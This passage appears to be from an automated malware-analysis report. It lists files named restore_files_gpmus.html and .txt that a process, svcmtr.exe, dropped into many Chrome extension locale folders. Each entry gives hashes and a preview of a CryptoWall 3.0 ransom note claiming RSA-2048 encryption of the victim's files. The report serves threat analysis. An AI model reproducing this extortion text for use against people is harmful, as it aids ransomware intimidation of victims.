                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\el\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en_GB\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en_GB\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\es\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\es\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\es_419\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\es_419\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\et\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\et\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fi\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fi\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fil\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fil\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
